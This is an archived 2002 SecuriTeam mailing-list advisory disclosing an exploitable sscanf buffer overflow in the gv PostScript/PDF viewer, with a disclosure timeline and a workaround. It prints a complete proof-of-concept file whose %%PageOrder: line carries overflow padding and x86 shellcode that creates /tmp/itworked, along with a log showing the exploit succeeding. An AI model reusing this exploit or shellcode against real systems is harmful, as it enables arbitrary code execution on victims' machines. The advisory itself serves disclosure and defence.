[UNIX] Exploitable Buffer Overflow in gv
From: support@securiteam.comDate: 09/30/02
- Previous message: support@securiteam.com: "[NT] Microsoft PPTP Server and Client Remote Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 30 Sep 2002 10:53:20 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Exploitable Buffer Overflow in gv
------------------------------------------------------------------------
SUMMARY
The gv program that is shipped on many UNIX systems contains a buffer
overflow that can be exploited by an attacker sending a malformed
postscript or Adobe PDF file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on his Linux
computer. The gv program is a PDF and postscript-viewing program for UNIX
that interfaces with the ghostscript interpreter. It is maintained at
<http://wwwthep.physik.uni-mainz.de/~plass/gv/>
http://wwwthep.physik.uni-mainz.de/~plass/gv/ by Johannes Plass. This
particular security vulnerability occurs in the source code where an
unsafe sscanf() call is used to interpret PostScript and PDF files.
DETAILS
Analysis:
In order to perform exploitation, an attacker would have to trick a user
into viewing a malformed PDF or PostScript file from the command line.
This may be somewhat easier for UNIX based email programs that associate
gv with email attachments. Since gv is not normally installed setuid root,
an attacker would only be able to cause arbitrary code to run with the
privileges of that user. Other programs that utilize derivatives of gv,
such as ggv or kghostview, may also be vulnerable in similar ways.
A proof of concept exploit for Red Hat Linux designed by zen-parse is
attached to this message. It packages the overflow and shellcode in the
"%%PageOrder:" section of the PDF.
[root@victim]# ls -al /tmp/itworked
/bin/ls: /tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
- -rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
[root@victim]#
Detection:
This vulnerability affects the latest version of gv, 3.5.8. An exploit has
been tested on Red Hat Linux 7.3.
Workaround:
To avoid potential exploitation, users can select alternatives to gv such
as Kghostview (included with the KDE desktop environment) for instance.
Additionally, the vulnerability does not seem to be exploitable when a
file is opened from the gv interface instead of the command line.
Vendor response:
The author could not be contacted, and the main home page has not been
updated since 1997. Coordinated public disclosure was scheduled for
September 26, 2002 with UNIX vendors.
Disclosure timeline:
8/23/2002 Disclosed to iDEFENSE
9/6/2002 Disclosed to vendor (plass@thep.physik.uni-mainz.de) by iDEFENSE
9/6/2002 Disclosed to iDEFENSE clients
9/12/2002 Disclosed to UNIX vendors
9/13/2002 Second vendor disclosure attempt
9/26/2002 Public Disclosure
Exploit code:
The following is a PDF file that once opened by the program will cause the
creation of: /tmp/itworked
%!PS-Adobe-3.0
%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)
%%CreationDate: Sat Jun 15 15:30ish
%%PageOrder:
AAAAAAAAABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDAB
CDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABC
DABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD
ABCDABCDABCDaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssss
ttttuuuuvvvvwwww òÿ¿@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@¼üÿÿ¿1
Àh//shh/bin‰ãPh//shh/bin‰áPh-ppc‰æPhrkedhitwohtmp/hFS}/hh${Ihtouc‰âPRVQTYPTZ°!HHHHH
HHHHHHHHHHHHHHHHHÍ€
%%EndComments
%%EOF
(NOTE: The lines have been wrapped, the above PDF is actually 7 lines, the
line long line starts with a %%PageOrder: and ends with a
HHHHHHHHHHHHHHHHHHHHHHÍ€)
ADDITIONAL INFORMATION
The information has been provided to iDEFENSE by
<mailto:zen-parse@gmx.net> zen-parse.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Microsoft PPTP Server and Client Remote Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
